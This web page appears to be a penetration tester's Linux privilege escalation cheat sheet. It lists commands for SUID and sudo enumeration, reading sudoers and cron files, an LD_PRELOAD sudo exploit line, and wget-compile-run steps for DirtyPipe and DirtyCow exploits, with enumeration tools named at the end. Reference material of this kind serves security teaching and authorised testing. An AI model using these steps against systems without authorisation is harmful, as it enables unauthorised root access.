Initializing VAULT-TEC OS...
Loading security protocols...
Establishing secure connection...
Connection established.
SYSTEM READY

Vault-Tec Terminal

ABOUT POSTS NOTES TOOLS

CheatSheets

CURL DNS File Transfer Hydra Impacket JohnTheRipper NCAT NMAP Online Resources Reverse Shell Wordlists

Active Directory

Mindmap Attacking AD Linux AD

Cloud

AWS Azure Google Terraform

Container

Docker Kubernetes

Linux

Penetration Testing Checklist Enumeration Privilege Escalation Post Exploitation Services Tools

Network

Data Exfiltration Port Scanning Reconnaissance Pivoting Services Traffic Analysis

Tech Stack

CMS Databases DevOps Enterprise Apps IAM Monitoring Open-Source Utilities Web Servers

Windows

AV/EDR Evasion Enumeration Privilege Escalation Post Exploitation

Web Application

Reconnaissance Common Vulnerabilities Authentication Bypass API Testing

Privilege Escalation Vectors

Unix Binaries

GTFOBins

SUID Binaries

# Find SUID binaries
find / -perm -4000 2>/dev/null

# Check common SUID binaries
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp

# Test SUID binaries
strings <binary>
strace <binary>

# Test SUID binaries for exploits
strings /usr/bin/nmap
strace /usr/bin/nmap

# Example exploit for older nmap (if SUID)
/usr/bin/nmap --interactive

Sudo

# Check sudo permissions
sudo -l

# Check sudoers files for misconfigs
cat /etc/sudoers
cat /etc/sudoers.d/*

# Exploit LD_PRELOAD
sudo LD_PRELOAD=/tmp/malicious.so <command>

# Exploit wildcards
sudo /bin/*

Cron Jobs

# Inspect cron jobs
cat /etc/cron.*
cat /var/spool/cron/crontabs/*
crontab -l

World-Writable Files

# Find world-writable files
find / -writable 2>/dev/null

Kernel Exploits

# Check kernel version
uname -r

# Find kernel exploits
searchsploit linux kernel $(uname -r)

# Run DirtyPipe exploit (example)
wget <dirtypipe_poc_url> -O dirtypipe.c
gcc dirtypipe.c -o dirtypipe
./dirtypipe

# Run DirtyC0w exploit (example)
wget <dirtycow_poc_url> -O dirtycow.c
gcc dirtycow.c -o dirtycow
./dirtycow

Service Misconfigurations

# Check service files
ls -l /etc/systemd/system/
ls -l /etc/init.d/

# Find writable service files
find /etc/systemd/system/ -writable 2>/dev/null
find /etc/init.d/ -writable 2>/dev/null

# Check unquoted paths in services
ps aux | grep <service>

Automated Enumeration Tools

  • LinPEAS
  • LinEnum
  • Linux Exploit Suggester
  • Linux Smart Enumeration
  • Unix Privesc Check